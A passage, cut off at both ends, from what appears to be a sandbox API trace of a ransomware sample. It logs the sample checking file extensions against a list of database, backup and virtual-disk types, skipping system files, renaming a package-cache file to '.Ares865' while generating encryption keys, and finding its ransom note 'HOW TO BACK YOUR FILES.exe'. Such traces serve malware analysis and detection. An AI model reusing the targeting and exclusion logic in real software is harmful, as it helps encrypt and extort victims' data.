[0078.165] lstrlenW (lpString="cma") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="cma") returned -1 [0078.165] lstrlenW (lpString="cpd") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="cpd") returned -1 [0078.165] lstrlenW (lpString="dacpac") returned 6 [0078.165] lstrcmpiW (lpString1="b1.cab", lpString2="dacpac") returned -1 [0078.165] lstrlenW (lpString="dad") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="dad") returned -1 [0078.165] lstrlenW (lpString="dadiagrams") returned 10 [0078.165] lstrlenW (lpString="daschema") returned 8 [0078.165] lstrlenW (lpString="db-journal") returned 10 [0078.165] lstrlenW (lpString="db-shm") returned 6 [0078.165] lstrcmpiW (lpString1="b1.cab", lpString2="db-shm") returned -1 [0078.165] lstrlenW (lpString="db-wal") returned 6 [0078.165] lstrcmpiW (lpString1="b1.cab", lpString2="db-wal") returned -1 [0078.165] lstrlenW (lpString="dbc") returned 3 [0078.165] lstrcmpiW (lpString1="cab", lpString2="dbc") returned -1 [0078.166] lstrlenW (lpString="dbs") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dbs") returned -1 [0078.166] lstrlenW (lpString="dbt") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dbt") returned -1 [0078.166] lstrlenW (lpString="dbv") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dbv") returned -1 [0078.166] lstrlenW (lpString="dbx") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dbx") returned -1 [0078.166] lstrlenW (lpString="dcb") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dcb") returned -1 [0078.166] lstrlenW (lpString="dct") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dct") returned -1 [0078.166] lstrlenW (lpString="dcx") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dcx") returned -1 [0078.166] lstrlenW (lpString="ddl") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="ddl") returned -1 [0078.166] lstrlenW (lpString="dlis") returned 4 [0078.166] lstrcmpiW (lpString1=".cab", lpString2="dlis") returned -1 [0078.166] lstrlenW (lpString="dp1") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dp1") returned -1 [0078.166] lstrlenW (lpString="dqy") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dqy") returned -1 [0078.166] lstrlenW (lpString="dsk") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dsk") returned -1 [0078.166] lstrlenW (lpString="dsn") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dsn") returned -1 [0078.166] lstrlenW (lpString="dtsx") returned 4 [0078.166] lstrcmpiW (lpString1=".cab", lpString2="dtsx") returned -1 [0078.166] lstrlenW (lpString="dxl") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="dxl") returned -1 [0078.166] lstrlenW (lpString="eco") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="eco") returned -1 [0078.166] lstrlenW (lpString="ecx") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="ecx") returned -1 [0078.166] lstrlenW (lpString="edb") returned 3 [0078.166] lstrcmpiW (lpString1="cab", lpString2="edb") returned -1 [0078.166] lstrlenW (lpString="epim") returned 4 [0078.167] lstrcmpiW (lpString1=".cab", lpString2="epim") returned -1 [0078.167] lstrlenW (lpString="fcd") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fcd") returned -1 [0078.167] lstrlenW (lpString="fdb") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fdb") returned -1 [0078.167] lstrlenW (lpString="fic") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fic") returned -1 [0078.167] lstrlenW (lpString="flexolibrary") returned 12 [0078.167] lstrlenW (lpString="fm5") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fm5") returned -1 [0078.167] lstrlenW (lpString="fmp") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fmp") returned -1 [0078.167] lstrlenW (lpString="fmp12") returned 5 [0078.167] lstrcmpiW (lpString1="1.cab", lpString2="fmp12") returned -1 [0078.167] lstrlenW (lpString="fmpsl") returned 5 [0078.167] lstrcmpiW (lpString1="1.cab", lpString2="fmpsl") returned -1 [0078.167] lstrlenW (lpString="fol") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fol") returned -1 [0078.167] lstrlenW (lpString="fp3") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fp3") returned -1 [0078.167] lstrlenW (lpString="fp4") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fp4") returned -1 [0078.167] lstrlenW (lpString="fp5") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fp5") returned -1 [0078.167] lstrlenW (lpString="fp7") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fp7") returned -1 [0078.167] lstrlenW (lpString="fpt") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="fpt") returned -1 [0078.167] lstrlenW (lpString="frm") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="frm") returned -1 [0078.167] lstrlenW (lpString="gdb") returned 3 [0078.167] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0078.167] lstrlenW (lpString="gdb") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="gdb") returned -1 [0078.168] lstrlenW (lpString="grdb") returned 4 [0078.168] lstrcmpiW (lpString1=".cab", lpString2="grdb") returned -1 [0078.168] lstrlenW (lpString="gwi") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="gwi") returned -1 [0078.168] lstrlenW (lpString="hdb") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="hdb") returned -1 [0078.168] lstrlenW (lpString="his") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="his") returned -1 [0078.168] lstrlenW (lpString="ib") returned 2 [0078.168] lstrcmpiW (lpString1="ab", lpString2="ib") returned -1 [0078.168] lstrlenW (lpString="idb") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="idb") returned -1 [0078.168] lstrlenW (lpString="ihx") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="ihx") returned -1 [0078.168] lstrlenW (lpString="itdb") returned 4 [0078.168] lstrcmpiW (lpString1=".cab", lpString2="itdb") returned -1 [0078.168] lstrlenW (lpString="itw") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="itw") returned -1 [0078.168] lstrlenW (lpString="jet") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="jet") returned -1 [0078.168] lstrlenW (lpString="jtx") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="jtx") returned -1 [0078.168] lstrlenW (lpString="kdb") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="kdb") returned -1 [0078.168] lstrlenW (lpString="kexi") returned 4 [0078.168] lstrcmpiW (lpString1=".cab", lpString2="kexi") returned -1 [0078.168] lstrlenW (lpString="kexic") returned 5 [0078.168] lstrcmpiW (lpString1="1.cab", lpString2="kexic") returned -1 [0078.168] lstrlenW (lpString="kexis") returned 5 [0078.168] lstrcmpiW (lpString1="1.cab", lpString2="kexis") returned -1 [0078.168] lstrlenW (lpString="lgc") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="lgc") returned -1 [0078.168] lstrlenW (lpString="lwx") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="lwx") returned -1 [0078.168] lstrlenW (lpString="maf") returned 3 [0078.168] lstrcmpiW (lpString1="cab", lpString2="maf") returned -1 [0078.168] lstrlenW (lpString="maq") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="maq") returned -1 [0078.169] lstrlenW (lpString="mar") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mar") returned -1 [0078.169] lstrlenW (lpString="marshal") returned 7 [0078.169] lstrcmpiW (lpString1="ab1.cab", lpString2="marshal") returned -1 [0078.169] lstrlenW (lpString="mas") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mas") returned -1 [0078.169] lstrlenW (lpString="mav") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mav") returned -1 [0078.169] lstrlenW (lpString="maw") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="maw") returned -1 [0078.169] lstrlenW (lpString="mdbhtml") returned 7 [0078.169] lstrcmpiW (lpString1="ab1.cab", lpString2="mdbhtml") returned -1 [0078.169] lstrlenW (lpString="mdn") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mdn") returned -1 [0078.169] lstrlenW (lpString="mdt") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mdt") returned -1 [0078.169] lstrlenW (lpString="mfd") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mfd") returned -1 [0078.169] lstrlenW (lpString="mpd") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mpd") returned -1 [0078.169] lstrlenW (lpString="mrg") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mrg") returned -1 [0078.169] lstrlenW (lpString="mud") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mud") returned -1 [0078.169] lstrlenW (lpString="mwb") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="mwb") returned -1 [0078.169] lstrlenW (lpString="myd") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="myd") returned -1 [0078.169] lstrlenW (lpString="ndf") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="ndf") returned -1 [0078.169] lstrlenW (lpString="nnt") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="nnt") returned -1 [0078.169] lstrlenW (lpString="nrmlib") returned 6 [0078.169] lstrcmpiW (lpString1="b1.cab", lpString2="nrmlib") returned -1 [0078.169] lstrlenW (lpString="ns2") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="ns2") returned -1 [0078.169] lstrlenW (lpString="ns3") returned 3 [0078.169] lstrcmpiW (lpString1="cab", lpString2="ns3") returned -1 [0078.170] lstrlenW (lpString="ns4") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="ns4") returned -1 [0078.170] lstrlenW (lpString="nsf") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="nsf") returned -1 [0078.170] lstrlenW (lpString="nv") returned 2 [0078.170] lstrcmpiW (lpString1="ab", lpString2="nv") returned -1 [0078.170] lstrlenW (lpString="nv2") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="nv2") returned -1 [0078.170] lstrlenW (lpString="nwdb") returned 4 [0078.170] lstrcmpiW (lpString1=".cab", lpString2="nwdb") returned -1 [0078.170] lstrlenW (lpString="nyf") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="nyf") returned -1 [0078.170] lstrlenW (lpString="odb") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0078.170] lstrlenW (lpString="odb") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="odb") returned -1 [0078.170] lstrlenW (lpString="oqy") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="oqy") returned -1 [0078.170] lstrlenW (lpString="ora") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="ora") returned -1 [0078.170] lstrlenW (lpString="orx") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="orx") returned -1 [0078.170] lstrlenW (lpString="owc") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="owc") returned -1 [0078.170] lstrlenW (lpString="p96") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="p96") returned -1 [0078.170] lstrlenW (lpString="p97") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="p97") returned -1 [0078.170] lstrlenW (lpString="pan") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="pan") returned -1 [0078.170] lstrlenW (lpString="pdb") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="pdb") returned -1 [0078.170] lstrlenW (lpString="pdm") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="pdm") returned -1 [0078.170] lstrlenW (lpString="pnz") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="pnz") returned -1 [0078.170] lstrlenW (lpString="qry") returned 3 [0078.170] lstrcmpiW (lpString1="cab", lpString2="qry") returned -1 [0078.170] lstrlenW (lpString="qvd") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="qvd") returned -1 [0078.171] lstrlenW (lpString="rbf") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="rbf") returned -1 [0078.171] lstrlenW (lpString="rctd") returned 4 [0078.171] lstrcmpiW (lpString1=".cab", lpString2="rctd") returned -1 [0078.171] lstrlenW (lpString="rod") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="rod") returned -1 [0078.171] lstrlenW (lpString="rodx") returned 4 [0078.171] lstrcmpiW (lpString1=".cab", lpString2="rodx") returned -1 [0078.171] lstrlenW (lpString="rpd") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="rpd") returned -1 [0078.171] lstrlenW (lpString="rsd") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="rsd") returned -1 [0078.171] lstrlenW (lpString="sas7bdat") returned 8 [0078.171] lstrlenW (lpString="sbf") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="sbf") returned -1 [0078.171] lstrlenW (lpString="scx") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="scx") returned -1 [0078.171] lstrlenW (lpString="sdb") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="sdb") returned -1 [0078.171] lstrlenW (lpString="sdc") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="sdc") returned -1 [0078.171] lstrlenW (lpString="sdf") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="sdf") returned -1 [0078.171] lstrlenW (lpString="sis") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="sis") returned -1 [0078.171] lstrlenW (lpString="spq") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="spq") returned -1 [0078.171] lstrlenW (lpString="te") returned 2 [0078.171] lstrcmpiW (lpString1="ab", lpString2="te") returned -1 [0078.171] lstrlenW (lpString="teacher") returned 7 [0078.171] lstrcmpiW (lpString1="ab1.cab", lpString2="teacher") returned -1 [0078.171] lstrlenW (lpString="tmd") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="tmd") returned -1 [0078.171] lstrlenW (lpString="tps") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="tps") returned -1 [0078.171] lstrlenW (lpString="trc") returned 3 [0078.171] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0078.171] lstrlenW (lpString="trc") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="trc") returned -1 [0078.172] lstrlenW (lpString="trm") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="trm") returned -1 [0078.172] lstrlenW (lpString="udb") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="udb") returned -1 [0078.172] lstrlenW (lpString="udl") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="udl") returned -1 [0078.172] lstrlenW (lpString="usr") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="usr") returned -1 [0078.172] lstrlenW (lpString="v12") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="v12") returned -1 [0078.172] lstrlenW (lpString="vis") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="vis") returned -1 [0078.172] lstrlenW (lpString="vpd") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="vpd") returned -1 [0078.172] lstrlenW (lpString="vvv") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="vvv") returned -1 [0078.172] lstrlenW (lpString="wdb") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="wdb") returned -1 [0078.172] lstrlenW (lpString="wmdb") returned 4 [0078.172] lstrcmpiW (lpString1=".cab", lpString2="wmdb") returned -1 [0078.172] lstrlenW (lpString="wrk") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="wrk") returned -1 [0078.172] lstrlenW (lpString="xdb") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="xdb") returned -1 [0078.172] lstrlenW (lpString="xld") returned 3 [0078.172] lstrcmpiW (lpString1="cab", lpString2="xld") returned -1 [0078.172] lstrlenW (lpString="xmlff") returned 5 [0078.172] lstrcmpiW (lpString1="1.cab", lpString2="xmlff") returned -1 [0078.172] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865") returned 133 [0078.172] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwFlags=0x1) returned 1 [0078.173] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.Ares865" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\cab1.cab.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0078.174] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=5204382) returned 1 [0078.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0078.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0078.174] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0160 [0078.174] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f01e8) returned 1 [0078.175] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0078.175] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.175] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f6ca0, lpName=0x0) returned 0x118 [0078.177] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x400000, dwNumberOfBytesToMap=0xf6ca0) returned 0x2e30000 [0078.222] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x200000) returned 0x3240000 [0078.307] UnmapViewOfFile (lpBaseAddress=0x3240000) returned 1 [0078.327] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f01e8) returned 1 [0078.327] CryptGenRandom (in: hProv=0x2f01e8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0078.327] CryptReleaseContext (hProv=0x2f01e8, dwFlags=0x0) returned 1 [0078.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0078.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0078.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0078.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0078.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0078.328] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0078.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0078.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0078.328] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0078.328] UnmapViewOfFile (lpBaseAddress=0x2e30000) returned 1 [0078.337] CloseHandle (hObject=0x118) returned 1 [0078.337] CloseHandle (hObject=0x15c) returned 1 [0078.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0078.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0078.337] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0078.381] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c231540, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c231540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0078.382] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0078.386] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfeab3900, ftCreationTime.dwHighDateTime=0x1d28824, ftLastAccessTime.dwLowDateTime=0xfeab3900, ftLastAccessTime.dwHighDateTime=0x1d28824, ftLastWriteTime.dwLowDateTime=0xfeab3900, ftLastWriteTime.dwHighDateTime=0x1d28824, nFileSizeHigh=0x0, nFileSizeLow=0x23000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vc_runtimeAdditional_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0078.386] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0078.386] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="aoldtz.exe") returned 1 [0078.386] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".") returned 1 [0078.386] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="..") returned 1 [0078.393] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="windows") returned -1 [0078.393] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="bootmgr") returned 1 [0078.394] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="temp") returned 1 [0078.394] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="pagefile.sys") returned 1 [0078.401] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="boot") returned 1 [0078.401] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ids.txt") returned 1 [0078.401] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="ntuser.dat") returned 1 [0078.401] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="perflogs") returned 1 [0078.401] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2="MSBuild") returned 1 [0078.401] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0078.402] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab") returned 125 [0078.402] lstrcpyW (in: lpString1=0x2cce4ea, lpString2="vc_runtimeAdditional_x86.msi" | out: lpString1="vc_runtimeAdditional_x86.msi") returned="vc_runtimeAdditional_x86.msi" [0078.406] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0078.406] lstrlenW (lpString="Ares865") returned 7 [0078.406] lstrcmpiW (lpString1="x86.msi", lpString2="Ares865") returned 1 [0078.414] lstrlenW (lpString=".dll") returned 4 [0078.414] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".dll") returned 1 [0078.414] lstrlenW (lpString=".lnk") returned 4 [0078.414] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".lnk") returned 1 [0078.414] lstrlenW (lpString=".ini") returned 4 [0078.416] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".ini") returned 1 [0078.416] lstrlenW (lpString=".sys") returned 4 [0078.421] lstrcmpiW (lpString1="vc_runtimeAdditional_x86.msi", lpString2=".sys") returned 1 [0078.421] lstrlenW (lpString="vc_runtimeAdditional_x86.msi") returned 28 [0078.421] lstrlenW (lpString="bak") returned 3 [0078.422] lstrcmpiW (lpString1="msi", lpString2="bak") returned 1 [0078.426] lstrlenW (lpString="ba_") returned 3 [0078.426] lstrcmpiW (lpString1="msi", lpString2="ba_") returned 1 [0078.434] lstrlenW (lpString="dbb") returned 3 [0078.434] lstrcmpiW (lpString1="msi", lpString2="dbb") returned 1 [0078.436] lstrlenW (lpString="vmdk") returned 4 [0078.436] lstrcmpiW (lpString1=".msi", lpString2="vmdk") returned -1 [0078.436] lstrlenW (lpString="rar") returned 3 [0078.436] lstrcmpiW (lpString1="msi", lpString2="rar") returned -1 [0078.436] lstrlenW (lpString="zip") returned 3 [0078.437] lstrcmpiW (lpString1="msi", lpString2="zip") returned -1 [0078.437] lstrlenW (lpString="tgz") returned 3 [0078.437] lstrcmpiW (lpString1="msi", lpString2="tgz") returned -1 [0078.438] lstrlenW (lpString="vbox") returned 4 [0078.443] lstrcmpiW (lpString1=".msi", lpString2="vbox") returned -1 [0078.443] lstrlenW (lpString="vdi") returned 3 [0078.444] lstrcmpiW (lpString1="msi", lpString2="vdi") returned -1 [0078.445] lstrlenW (lpString="vhd") returned 3 [0078.445] lstrcmpiW (lpString1="msi", lpString2="vhd") returned -1 [0078.448] lstrlenW (lpString="vhdx") returned 4 [0078.448] lstrcmpiW (lpString1=".msi", lpString2="vhdx") returned -1 [0078.448] lstrlenW (lpString="avhd") returned 4 [0078.456] lstrcmpiW (lpString1=".msi", lpString2="avhd") returned -1 [0078.456] lstrlenW (lpString="db") returned 2 [0078.456] lstrcmpiW (lpString1="si", lpString2="db") returned 1 [0078.456] lstrlenW (lpString="db2") returned 3 [0078.456] lstrcmpiW (lpString1="msi", lpString2="db2") returned 1 [0078.456] lstrlenW (lpString="db3") returned 3 [0078.457] lstrcmpiW (lpString1="msi", lpString2="db3") returned 1 [0078.463] lstrlenW (lpString="dbf") returned 3 [0078.463] lstrcmpiW (lpString1="msi", lpString2="dbf") returned 1 [0078.467] lstrlenW (lpString="mdf") returned 3 [0078.475] lstrcmpiW (lpString1="msi", lpString2="mdf") returned 1 [0078.476] lstrlenW (lpString="mdb") returned 3 [0078.476] lstrcmpiW (lpString1="msi", lpString2="mdb") returned 1 [0078.476] lstrlenW (lpString="sql") returned 3 [0078.481] lstrcmpiW (lpString1="msi", lpString2="sql") returned -1 [0078.482] lstrlenW (lpString="sqlite") returned 6 [0078.482] lstrcmpiW (lpString1="86.msi", lpString2="sqlite") returned -1 [0078.525] lstrlenW (lpString="sqlite3") returned 7 [0078.525] lstrcmpiW (lpString1="x86.msi", lpString2="sqlite3") returned 1 [0078.525] lstrlenW (lpString="sqlitedb") returned 8 [0078.525] lstrcmpiW (lpString1="_x86.msi", lpString2="sqlitedb") returned -1 [0078.525] lstrlenW (lpString="xml") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="xml") returned -1 [0078.525] lstrlenW (lpString="$er") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="$er") returned 1 [0078.525] lstrlenW (lpString="4dd") returned 3 [0078.525] lstrcmpiW (lpString1="msi", lpString2="4dd") returned 